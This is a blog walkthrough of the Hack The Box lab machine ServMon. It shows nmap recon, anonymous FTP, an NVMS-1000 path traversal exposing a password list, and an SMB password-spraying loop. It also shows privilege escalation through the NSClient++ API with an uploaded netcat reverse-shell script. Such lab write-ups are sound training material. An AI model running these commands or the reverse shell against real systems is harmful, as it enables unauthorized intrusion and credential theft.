Saturday, July 4, 2020

Hack The Box - ServMon

by Renato "shrimpgo" Pacheco

Hi! Let’s go for another writeup from Hack The Box, Servmon machine, level easy. It’s a Windows machine and below there is a recon by nmap:

[email protected]:~# nmap -sS -p- -O 10.10.10.184
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-06 23:48 -03
Nmap scan report for servmon (10.10.10.184)
Host is up (0.13s latency).
Not shown: 65516 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
80/tcp    open  http
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
5040/tcp  open  unknown
5666/tcp  open  nrpe
6063/tcp  open  x11
6699/tcp  open  napster
7680/tcp  open  pando-pub
8443/tcp  open  https-alt
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/7%OT=21%CT=1%CU=34019%PV=Y%DS=2%DC=I%G=Y%TM=5EB37A77
OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FF%GCD=1%ISR=109%TI=I%CI=I%II=I%SS=S%TS=U)
OS:OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS%O
OS:6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%DF
OS:=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%
OS:Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z
OS:%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%
OS:DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%
OS:O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=8
OS:0%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)

Network Distance: 2 hops

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 864.42 seconds

There is a lot of services available and that is a good thing. By enumerating main services:

  • 21 FTP
  • 22 SSH
  • 445 SMB Share
  • 80 HTTP (NVMS ???)
  • 8443 HTTPS (Nagios Web Config)
  • 5666 NRPE (Nagios Agent)

Let’s start with FTP. The first thing in FTP service is checking if Anonymous user are available (with no password).

[email protected]:~# ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.

Nice! We’re in. There is a directory labeled Users. Inside it has two directory: Nadine and Nathan:

ftp> cd Users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.

Inside of Nadine directory has text file called Confidential.txt saying:

Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

And Nathan directory has another text file called Notes to do.txt saying:

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

We have some tips here, let’s unite them:

  • In Nathan’s Desktop directory has a file called Passwords.txt.
  • Only two tasks were made by Nathan, so access to NVMS are available.
  • What is NVMS?
  • We confirmed that NSClient is available on the host and it will be useful later

What is NVMS?. By accessing port 80, I saw this login screen:

NVMS-1000

At first search on Google, it told me that NVMS-1000 is a DVR (Digital Video Recorder), so I’ve searched for some vulnerability about it and I found this. It’s a script that exploits a path traversal on NVMS-1000 web configuration. By using this script, let’s try to read that Nathan’s file Passwords.txt:

[email protected]:# ./nvms.py 10.10.10.184 /users/nathan/desktop/passwords.txt
[+] DT Attack Succeeded
[+] File Content

++++++++++ BEGIN ++++++++++
1nsp3ctTh3Way2Mars!                                       
Th3r34r3To0M4nyTrait0r5!                                 
B3WithM30r4ga1n5tMe                                       
[email protected]                                         
0nly7h3y0unGWi11F0l10w                                   
IfH3s4b0Utg0t0H1sH0me                                     
Gr4etN3w5w17hMySk1Pa5$                                   
++++++++++  END  ++++++++++

Now I have two users and 7 passwords that I can try out. I made a script using SMB protocol to test each user and password:

  • Nathan
    [email protected]:~# for i in $(< passwords.txt); do echo -n "$i => "; smbclient -U nathan%$i -L //10.10.10.184/; done
    1nsp3ctTh3Way2Mars! => session setup failed: NT_STATUS_LOGON_FAILURE
    Th3r34r3To0M4nyTrait0r5! => session setup failed: NT_STATUS_LOGON_FAILURE
    B3WithM30r4ga1n5tMe => session setup failed: NT_STATUS_LOGON_FAILURE
    [email protected] => session setup failed: NT_STATUS_LOGON_FAILURE
    0nly7h3y0unGWi11F0l10w => session setup failed: NT_STATUS_LOGON_FAILURE
    IfH3s4b0Utg0t0H1sH0me => session setup failed: NT_STATUS_LOGON_FAILURE
    Gr4etN3w5w17hMySk1Pa5$ => session setup failed: NT_STATUS_LOGON_FAILURE
    

    None of this passwords belongs to Nathan.

  • Nadine
    [email protected]:~# for i in $(< passwords.txt); do echo -n "$i => "; smbclient -U nadine%$i -L //10.10.10.184/; done
    1nsp3ctTh3Way2Mars! => session setup failed: NT_STATUS_LOGON_FAILURE
    Th3r34r3To0M4nyTrait0r5! => session setup failed: NT_STATUS_LOGON_FAILURE
    B3WithM30r4ga1n5tMe => session setup failed: NT_STATUS_LOGON_FAILURE
    [email protected] => 
          Sharename       Type      Comment
          ---------       ----      -------
          ADMIN$          Disk      Remote Admin
          C$              Disk      Default share
          IPC$            IPC       Remote IPC
    SMB1 disabled -- no workgroup available
    0nly7h3y0unGWi11F0l10w => session setup failed: NT_STATUS_LOGON_FAILURE
    IfH3s4b0Utg0t0H1sH0me => session setup failed: NT_STATUS_LOGON_FAILURE
    Gr4etN3w5w17hMySk1Pa5$ => session setup failed: NT_STATUS_LOGON_FAILURE
    

    Hey! User Nadine has password [email protected]. I spent my time trying psexec, wmiexec, smbexec and none of them worked. However, I forgot about my first recon: there is SSH service running on host. OK then:

[email protected]:~# ssh [email protected]
[email protected]'s password:

Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.
                                                    
[email protected] C:\Users\Nadine>type Desktop\user.txt
[REDACTED]

I’ve just owned user. Now I have to escalate privileges. By making the recon over the host and searching for some admin’s privileges, Nadine user has no specific privilege at all. I have to find another way to escalate privileges. Then I remembered about NSClient running on host. By searching for exploit for NSClient, here teaches how to escalate privileges by web configuration interface. OK, I tried to follow this tutorial getting the password at \Program Files\NSClient++\nsclient.ini and I tried to logon in NSClient web configuration in port 8443, but it didn’t work. When I came back on Nadine’s checklist in FTP, I saw that NSClient access was locked and nsclient.ini confirmed this:

[email protected] C:\Users\Nadine>type "\Program Files\NSClient++\nsclient.ini"
...
; Undocumented key                                       
password = ew2x6SsGTxjRwXOT                               

; Undocumented key                                       
allowed hosts = 127.0.0.1
...

Now what? I spent my time again wondering that should I had to do. Then I decided to start from begining: reading the NSClient++ docs! By reading at first glance, I noticed this:

NSClient++ Main Page

There is an API! In my hand I have password admin located at nsclient.ini. By according with this manual, that’s the way how to authenticate and access NSClient++ API:

curl -s -k -u admin https://localhost:8443/api/v1/info

But I didn’t have curl in Windows. I had to download it here, decompressed it and sent the curl directory via SSH into Nadine user. If everything worked well, the output will looks like this:

{"name":"NSClient++","version":"0.5.2.35 2018-01-28","version_url":"https://localhost:8443/api/v1/info/version"}

By following here, the next steps are:

  • Create script to reverse shell
  • Register script into NSClient++
  • Force to run this script registered into NSClient++ (somehow)

The script needs to connect to my host when called by NSClient++, but how it will connect? There so many ways to do this and I chose NetCat, but you can choose Powershell, Python, Lua… NSClient++ supports all of these languages. Pick one! Getting back, I’ve downloaded NetCat for Windows and sent it:

I made this batch script below to register in NSClient++ called evil.bat:

@echo off
c:\temp\nc.exe 10.10.13.13 4444 -e cmd.exe

And sent it via SSH:

[email protected]:~# scp evil.bat [email protected]:/users/nadine/Desktop

Alright! It’s time to register this script into NSClient++. By reading more NSClient++ document and learning more about its API, I found this section and I could register my script:

[email protected] C:\Users\Nadine\Desktop>curl-7.70.0-win64-mingw\bin\curl.exe -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/evil.bat --data-binary @evil.bat
Added evil as scripts\evil.bat

The last step is force NSClient++ to run my malicious script, according with this section, but before this, I had to prepare my host to listen this specific connection:

[email protected]:~# nc -lvp 4444
listening on [any] 4444...

Now I force running my script:

[email protected] C:\Users\Nadine\Desktop>curl-7.70.0-win64-mingw\bin\curl.exe -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://localhost:8443/api/v1/queries/evil/commands/execute

Checking my terminal listening to port 4444:

[email protected]:~# nc -lvp 4444
listening on [any] 4444...
connect to [10.10.13.13] from servmon [10.10.10.184] 49733
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>

Game over!

Hack the Box , Pentest , Writeup